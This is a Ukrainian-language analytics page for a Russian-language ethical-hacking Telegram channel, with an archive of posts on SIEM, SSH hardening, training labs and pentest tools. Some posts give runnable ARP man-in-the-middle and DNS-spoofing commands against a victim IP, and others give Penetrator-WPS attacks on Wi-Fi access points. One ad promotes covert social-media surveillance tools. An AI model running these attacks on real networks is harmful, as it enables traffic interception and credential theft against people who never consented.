uk
Feedback
CodeGuard: PySec Edition

CodeGuard: PySec Edition

Закритий канал

Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy

Показати більше

📈 Аналітичний огляд Telegram-каналу CodeGuard: PySec Edition

Канал CodeGuard: PySec Edition є активним учасником. На даний момент спільнота об'єднує 14 117 підписників, посідаючи 8 765 місце в категорії Технології та додатки та 45 874 місце у регіоні Росія.

📊 Показники аудиторії та динаміка

З моменту свого створення невідомо, проект продемонстрував стрімке зростання, зібравши аудиторію у 14 117 підписників.

За останніми даними від 27 вересня, 2026, канал демонструє стабільну активність. Хоча за останні 30 днів спостерігається зміна кількості учасників на 805, а за останні 24 години на -8, загальне охоплення залишається високим.

  • Статус верифікації: Не верифікований
  • Рівень залученості (ER): Середній показник залученості аудиторії становить 9.78%. Протягом перших 24 годин після публікації контент зазвичай збирає 5.55% реакцій від загальної кількості підписників.
  • Охоплення публікацій: В середньому кожен допис отримує 1 378 переглядів. Протягом першої доби публікація в середньому набирає 782 переглядів.
  • Реакції та взаємодія: Аудиторія активно підтримує контент: середня кількість реакцій на один пост – 7.
  • Тематичні інтереси: Контент зосереджений навколо ключових тем, таких як codeguard, pysec, docker, grep, контейнер.

📝 Опис та контентна політика

Автор описує ресурс як майданчик для висловлення суб'єктивної думки:
“Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”

Завдяки високій частоті оновлень (останні дані отримано 28 вересня, 2026), канал підтримує актуальність та високий рівень охоплення публікацій. Аналітика показує, що аудиторія активно взаємодіє з контентом, що робить його важливою точкою впливу в категорії Технології та додатки.

14 117
Підписники
-824 години
+2107 днів
+80530 днів
Архів дописів
✅ Учим Wazuh искать уязвимости Народный SIEM Wazuh активно используется специалистами ИБ в различных организациях. Он может с
✅ Учим Wazuh искать уязвимости Народный SIEM Wazuh активно используется специалистами ИБ в различных организациях. Он может собирать и анализировать события безопасности получаемые с источников, генерировать уведомления об инцидентах и строить отчеты. Однако, было бы неплохо, чтобы он еще умел подавать кофе производить оценку конфигурации безопасности. Оценка безопасности конфигурации — это процесс проверки соответствия всех систем набору предопределенных правил, касающихся параметров конфигурации и разрешенного использования приложений. Одним из наиболее надежных способов обеспечения безопасности ресурсов сети является усиление их защищенности. Таким образом, оценка безопасности конфигурации — это эффективный способ выявить слабые места в ваших конечных точках и устранить их, чтобы уменьшить вероятность атаки. 📁 Интересно? Тогда сюда 😈 CodeGuard | Chat

⚡️ ChatGPT, Sora 2, Veo 3 — всё это ДЕТСКИЕ ИГРУШКИ по сравнению с профессиональными ИИ, которых нет в публичном доступе Таки
⚡️ ChatGPT, Sora 2, Veo 3 — всё это ДЕТСКИЕ ИГРУШКИ по сравнению с профессиональными ИИ, которых нет в публичном доступе Такими находками делится анонимный хакер в закрытом канале «Доктор GPT». Например? • Spectator V+ — профессиональная слежка за людьми в соцсетях: лайки, подписки репосты даже на закрытых аккаунтах. • Agenta — инструмент военной разведки, отслеживающий ракеты и БПЛА в воздухе. • Daytona AI — бесплатный генератор реалистичных видео и фото БЕЗ ЦЕНЗУРЫ И ОГРАНИЧЕНИЙ. И это ещё цветочки. Внутри — полный фарш, с которым вы станете почти всемогущим. Пользуйтесь с умом.

💻 Hunner — мощный фреймворк для пентеста Если бы инструменты тестирования безопасности были рок-звездами, Hunner занял бы ме
💻 Hunner — мощный фреймворк для пентеста Если бы инструменты тестирования безопасности были рок-звездами, Hunner занял бы место хэдлайнера. Это набор скриптов, который автоматизирует рутинные проверки и помогает находить распространённые веб-уязвимости.
🧩 Функционал Hunner включает: 1. SQL-сканирование для выявления уязвимых мест в базах данных. 2. XSS-сканирование для поиска точек внедрения вредоносного JavaScript. 3. DOS-тесты для проверки устойчивости (только с разрешения!). 4. Bruteforce FTP — атаки на тестовые учётные данные. 5. Bruteforce SSH — проверка надёжности SSH-креденшел. 6. Bruteforce почтовых аккаунтов (для тестовых данных).
🐱 Репозиторий и подробности 😈 CodeGuard | Chat

The Dark - приватный канал от специалиста по цифровой криминалистике. • Годные OSINT инструменты; • Нейросети; • Malware Analysis Впервые открыт свободный вход Welcome to The Dark

🔒 Подборка уязвимых сред и программ для тренировки в информационной безопасности: 1. bWAPP — бесплатное уязвимое веб-приложение с открытым исходным кодом, идеально подходит для изучения разных видов атак в контролируемой среде. 2. Damn Vulnerable Web Application (DVWA) — классика для отработки навыков пентеста с уровнями сложности и разнообразными веб-уязвимостями. 3. Damn Vulnerable Web Services — платформа для изучения уязвимостей веб-сервисов с практикой. 4. OWASP Broken Web Applications Project — набор уязвимых веб-приложений для комплексной тренировки. 5. OWASP Mutillidae II — учебное веб-приложение с широким спектром уязвимостей и настройками безопасности. 6. Samurai Web Testing Framework — специализированный фреймворк для тестирования веб-уязвимостей с готовым окружением. 7. Web Security Dojo — обучающее окружение с набором инструментов и уязвимых приложений для практики. Эти инструменты помогут практиковать и углублять знания по кибербезопасности в безопасной среде. 😈 CodeGuard | Chat

✅ DNSSEC и DNS: как доменные имена управляют интернетом + настройка BIND на Ubuntu Все мы любим, когда интернет работает (и н
✅ DNSSEC и DNS: как доменные имена управляют интернетом + настройка BIND на Ubuntu Все мы любим, когда интернет работает (и не виснет 🙂) — сайты открываются, видео грузятся, письма доходят. Но мало кто задумывается, как именно браузер узнаёт, куда вас отправить, когда вы вводите знакомое «habr.com».  Эта статья для тех, кто хочет понять, как именно устроена и работает система доменных имён, её защита на уровне DNSSEC и почему эта технология важна для безопасности интернета. Если вы техно-гик и не боитесь деталей — добро пожаловать под кат! Так как DNSSEC — надстройка над DNS, сначала нужно объяснить самое простое. Чтобы понять друг друга, мы с вами общаемся (слишком логично, я понимаю). Например, к вам подошёл прохожий и спросил: «как пройти на улицу Ленина?». Вы ему показали, объяснили маршрут и он пошёл по указанному пути и пришёл куда надо. 📁 Читать полностью на Хабре 😈CodeGuard | Chat

🔎 Обзор полезных инструментов для пентестера В море известных инструментов для пентеста всегда можно найти несколько скрытых жемчужин, которые делают аудит эффективнее и интереснее. Вот подборка полезного софта, который стоит попробовать, если хочешь выделиться среди пентестеров. 🔥 Anew — автоматизированный фреймворк для сбора информации и разведки. Поддерживает массовый сбор поддоменов, открытых портов и данных с зовнишних API.
anew -d example.com -o output.txt
😆 SubOver — инструмент для поиска поддоменов с помощью пассивных и активных методов, включая bruteforce с уникальными словарями.
subover -d example.com
🛡 Sn1per — автоматизированный скрипт для показа багов и уязвимостей, объединяет более 100 пентест-утилит в одном наборе. Отлично подходит для быстрого и глубокого исследования.
sn1per -t target.com -m passive
😄 Httpx — ультрабыстрый инструмент для проверки живых URL, анализа заголовков и SSL-сертификатов, с большим потенциалом для кастомизации.
httpx -l urls.txt -ssl -title
🎣 Gau (GetAllUrls) — позволяет за секунды вытащить все возможные URL целевого домена из различных публичных источников и кэшей.
gau example.com > urls.txt
💡 QTester — Python-инструмент для автоматизации SQL-инъекций и XSS с анализом пригодности payload’ов. Полезен на этапах ручного и полуавтоматического тестирования.
Рекомендую для изучения: — https://github.com/projectdiscovery/anew — https://github.com/Ice3man543/SubOver — https://github.com/1N3/Sn1per — https://github.com/projectdiscovery/httpx — https://github.com/lc/gau — https://github.com/QTester
Погружайся глубже😂 , автоматизируй быстрее и не забывай ставить 👍) 😈 CodeGuard | Chat

🔥 Лучшие каналы по кодингу Зайди в любой из них и убедись в этом сам! 🥶 Hacking - t.me/indigo_hack 👊 Linux & Bash - t.me/linux_bash 👩‍💻 Web - t.me/indigo_web 👩‍💻 Python - t.me/indigo_python База знаний - Здесь (открыто) 🔥 Не упусти шанс стать частью нашего сообщества ⚡️

👩‍💻 Криптография для практиков: Защищаем переписку по SSH с примерами команд SSH — не только безопасный протокол, но и набор мощных инструментов для надежной защиты удаленного взаимодействия. Давайте подробно разберем, как конфигурировать SSH и использовать его возможности для шифрования и аутентификации. 👉 1. Генерация ключей и базовая настройка Создаем пару ключей Ed25519 с паролем для шифрования личного ключа:
ssh-keygen -t ed25519 -a 100 -C "your_email@example.com"
Параметр -a 100 усиливает защиту ключа с помощью многораундового шифрования. Копируем публичный ключ на сервер:
ssh-copy-id user@server
🖥 2. Настройка SSH клиента для удобства и безопасности Правим файл ~/.ssh/config:
Host myserver
    HostName server.example.com
    User user
    Port 2222
    IdentityFile ~/.ssh/id_ed25519
    IdentitiesOnly yes
Теперь можно подключаться просто командой ssh myserver. Порт 2222 защищает от стандартных атак на 22-й. ⚙️ 3. Отключение паролей для повышения безопасности На сервере редактируем /etc/ssh/sshd_config:
PasswordAuthentication no
PermitRootLogin no
PubkeyAuthentication yes
Port 2222
Делаем резервную копию файла перед изменением и перезапускаем SSH:
sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.backup
sudo systemctl restart sshd
🐳 4. Использование шифров и алгоритмов Для контроля алгоритмов добавим в ~/.ssh/config:
Host myserver
    Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com
    KexAlgorithms curve25519-sha256
Ограничение по криптографии улучшает защиту от устаревших и слабых методов. 📌 5. Включение двухфакторной аутентификации (2FA) Устанавливаем Google Authenticator на сервер:
sudo apt install libpam-google-authenticator
google-authenticator
Добавляем в /etc/pam.d/sshd строку:
auth required pam_google_authenticator.so
И в sshd_config:
ChallengeResponseAuthentication yes
AuthenticationMethods publickey,keyboard-interactive
Перезапускаем SSH. Такая настройка позволит не только надежно шифровать переписку по SSH, но и исключит риски, связанные с паролями, а также повысит общую устойчивость вашей инфраструктуры. 😈 CodeGuard | Chat | #SSH #2FA #DevOps

📕 Книга: «Основы веб-хакинга. Более 30 примеров уязвимостей» Авторы: Peter Yaworski и Eugene Burmakin Год: 2016 Если хочешь
📕 Книга: «Основы веб-хакинга. Более 30 примеров уязвимостей» Авторы: Peter Yaworski и Eugene Burmakin Год: 2016
Если хочешь научиться искать и понимать реальные уязвимости в веб-приложениях — эта книга для тебя. Да, не самая новая, 2016год, но на основе реальных кейсов раскрываются популярные методы этичного хакинга, для основы самое то. 👨‍💻 Что внутри: - Распространённые уязвимости: XSS, CSRF, RCE и другие - Ошибки в логике и конфигурациях веб-приложений - Манипуляции с HTTP-запросами и open redirect - Поиск багов и участие в багбаунти-программах - Реальные примеры с выплатами и объяснения 💠 Бери книгу → [Archive] 😈 CodeGuard |Chat | #book #webhacking #pentest

💬 Давайте общаться! У нас есть уютный чат для вопросов, новостей и обмена опытом — все дружелюбной атмосфере. p.s а еще у нас там архив с книгами, курсами и т.п 🌡 https://t.me/+t_SZROs0Gj4wYTFi Присоединяйтесь и становитесь частью нашего сообщества. Ждём вас! 😈 CodeGuard | Chat

🤔 Kali Pi-Tail на Raspberry Pi Zero — портативный хакер в вашем кармане Используйте Kali Linux на Raspberry Pi Zero 2 W для
🤔 Kali Pi-Tail на Raspberry Pi Zero — портативный хакер в вашем кармане Используйте Kali Linux на Raspberry Pi Zero 2 W для создания компактного устройства для пентеста и кибербезопасности. В статье показано, как установить и настроить Kali Pi-Tail в headless-режиме — без экрана, с питанием и управлением через смартфон по SSH или VNC. Такой девайс отлично подходит для мобильного аудита безопасности и тестирования сетей. 🔗 Инструкция по установке 😈 CodeGuard | Chat

⚠️ Крупнейшей библиотеки хакинга Practical Ethical Hacking Resources Если хотите получить самое полное образование и базу для пентеста, обратите внимание на репозиторий Practical Ethical Hacking Resources от TCM-Course-Resources.
Что есть в репозитории: — Теоретическая база по этичному хакингу и тестированию на проникновение — Полный разбор кейсов с реальными примерами успешных атак и контрмер — Подробный курс Linux для хакеров с понятными объяснениями и практикой — Большой список инструментов и скриптов для различных этапов пентеста — Ссылки на учебные материалы, видео, заметки и комьюнити
📱 Ресурс на GitHub Универсальный репозиторий, который стоит добавить в закладки каждого пентестера и этичного хакера 😈 CodeGuard | Chat | #pentesting #hacking #opensource

🔍 Цифровой след: как управлять своей репутацией в сети Цифровая репутация — это совокупность ваших публикаций, комментариев, отзывов, профилей в соцсетях, упоминаний в СМИ и данных в открытых источниках. Репутация напрямую влияет на доверие аудитории, развитие бизнеса и личный образ в сети. 📌 Рекомендации: - Используйте SERM (Search Engine Reputation Management) для управления выдачей в поисковых системах - Вовлекайте лояльную аудиторию к формированию положительного контента - Быстро отвечайте на негатив, минимизируйте его последствия - Применяйте специализированные инструменты для сбора и анализа отзывов 🔗 Разбор в статье SecurityLab Управляйте своим цифровым следом осознанно и не позволяйте случайностям формировать ваш имидж в сети 😈 CodeGuard | Chat | #digitalreputation #onlinereputation #security

👩‍💻 Кодер — не профессия, а образ мышления 👩‍💻 Программист — это не тот, кто знает синтаксис. Это тот, кто видит решение там, где другие видят хаос. 👩‍💻 Python — язык, который раскрывает логику, а не пугает ею. 💪 Присоединяйся и начинай думать PythonCrafting

😈 Перехват и подделка DNS-трафика — кейсы с командами DNS нацелены на перевод имён в IP, и их подмена даёт полный контроль н
😈 Перехват и подделка DNS-трафика — кейсы с командами DNS нацелены на перевод имён в IP, и их подмена даёт полный контроль над трафиком. Вот рабочие инструменты и команды для перехвата и spoofing на Linux. 🔥 dnsspoof — легкий инструмент для перехвата и подмены DNS в локальной сети:
sudo apt install dsniff

# Включить форвардинг пакетов
sudo sysctl -w net.ipv4.ip_forward=1

# ARP-спуфинг между жертвой и роутером
sudo arpspoof -i eth0 -t 192.168.1.5 192.168.1.1

# Подмена DNS по списку из hosts.txt
sudo dnsspoof -i eth0 -f hosts.txt
Содержимое hosts.txt:
example.com 1.2.3.4
🟫 ettercap — мощный MITM-инструмент с DNS-spoofing:
sudo apt install ettercap-text-only
sudo sysctl -w net.ipv4.ip_forward=1
sudo ettercap -T -i eth0 -M arp:remote /192.168.1.5/ /192.168.1.1/ -P dns_spoof
- Этот набор команд включает ARP MITM между жертвой и роутером с подменой DNS. 🛜 dnschef — DNS-прокси для легкой подмены:
sudo apt install python3-pip
pip3 install dnschef

sudo dnschef --interface eth0 --fakeip 5.6.7.8 --fakedomains example.com
Всё, что запросит example.com — получит 5.6.7.8.
⚡️ Живые кейсы и трюки: — ARP-спуфинг через arpspoof + dnsspoof для полного контроля DNS-запросов в локальной сети — DNS-подмена в pcap файле через scapy/wireshark для офлайнового анализа — Тестирование резервного сценария при подмене DNS для мобильных и IoT-устройств
📚 Полезные обучающие материалы и инструкции: — DNS spoofing с dnsspoof и arpspoof — Пошаговая настройка mitm с DNSspoof — dnschef Применяй эти команды на тестовых стендах и в рамках закона 😈 CodeGuard | Chat

✉️ Атака через USB-порт: PoisonTap PoisonTap — компактное устройство на базе Raspberry Pi Zero, способное атаковать компьютер через USB-порт. Работает даже на заблокированных машинах, что делает его особенно опасным для пользователей с паролями. Как это работает: при подключении PoisonTap маскируется под Ethernet-адаптер и перехватывает DHCP-запросы ОС. Весь исходящий компьютерный трафик проходит через него, позволяя захватывать и изменять данные.
🚨 Какие угрозы создаёт PoisonTap: - Перехват интернет-трафика: устройство ворует куки и сессии миллионов сайтов, включая Google и Facebook. - Кэширование вредоносного кода: в локальный кэш браузера внедряются опасные HTML и JavaScript, создавая бэкдоры, которые сохраняются даже после отключения PoisonTap.
Полезные материалы для подробного изучения: — Домашняя страница — GitHub-репозиторий — Статья на Хакере Будьте внимательны с неизвестными USB-устройствами 😈 CodeGuard | Chat

🌐Технологии, которые держат мир на связи. Как выглядит современный Wi-Fi и что влияет на его безопасность Привет, участникам
🌐Технологии, которые держат мир на связи. Как выглядит современный Wi-Fi и что влияет на его безопасность Привет, участникам CodeGuard! На связи команда PT Cyber Analytics. Мы подготовили для вас материал по устройству и безопасности современных беспроводных сетей. В его основе — результаты проведенных проектов и экспертиза наших исследователей. Представьте, что вы вернулись в 1995 год. Там, где вместо гигабитных скоростей — dial-up, вместо Netflix — видеокассеты, а Wi-Fi — это магия, передающая данные со скоростью всего лишь 1–2 Мбит/с. Сейчас все иначе: беспроводные сети — от домашнего Wi-Fi до корпоративных инфраструктур, поддерживающих сотни устройств одновременно, — стали неотъемлемой частью нашей цифровой жизни. ✅ Читать полностью на Хабре 😈 CodeGuard | Chat

Утилита для атаки на Wi-Fi — Penetrator-WPS Penetrator-WPS — консольная утилита для атаки на WPS (Wi-Fi Protected Setup). Она позволяет в реальном времени атаковать множество беспроводных точек доступа с включённым WPS. 🔍 Работает через атаку Pixie Dust — автономный метод взлома протокола WPS, который помогает получить доступ к паролям роутеров. Для работы требуется установленная утилита PixieWPS.
🛠 Основные возможности: - Сканирование точек с включённым WPS - Одновременная атака нескольких целей - Запуск атаки Pixie Dust с автоматическим обходом - Гибкая настройка каналов и целей
📥 Установка (пример для Kali Linux):
apt-get install libpcap-dev libssl-dev -y
git clone https://github.com/xXx-stalin-666-money-xXx/penetrator-wps.git
cd penetrator-wps/
./install.sh
penetrator
🚀 Примеры запуска: — Ручная атака на конкретные цели:
penetrator -i wlan0 -c 1 -b 11:22:33:44:55:66 -e example -b 66:55:44:33:22:11
— Сканирование и атака всех точек на канале 1:
penetrator -i wlan0 -c 1
— Атака всех доступных точек с WPS с использованием Pixie Dust:
penetrator -i wlan0 -A
— Последовательная атака поочерёдно всех точек с WPS:
penetrator -i wlan0 -A -M
⚠️ Важно: Используйте Penetrator-WPS только в легальных целях и в сетях, на которые у вас есть разрешение 📂 Репозиторий на GitHub 😈 CodeGuard | Chat

🌍 90-дневный план обучения кибербезопасности Репозиторий с подробным 90-дневным планом изучения кибербезопасности от Farhan
🌍 90-дневный план обучения кибербезопасности Репозиторий с подробным 90-дневным планом изучения кибербезопасности от Farhan Ashraf
👩‍💻 Весь курс разбит на ежедневные задачи с ресурсами и материалами. Темы охватывают: — Network+ (основы сетей) — Security+ (принципы безопасности) — Linux (основы и командная строка) — Python (для задач безопасности) — Анализ сетевого трафика — Git (контроль версий) — ELK (логирование и аналитика) — Облачные платформы: GCP, AWS, Azure — Хакинг (этичный и практический) — Составление резюме и поиск работы
Это структурированный и удобный план для любого уровня, помогающий системно осваивать ключевые навыки ИБ. 📱 План обучения 😈 CodeGuard | Chat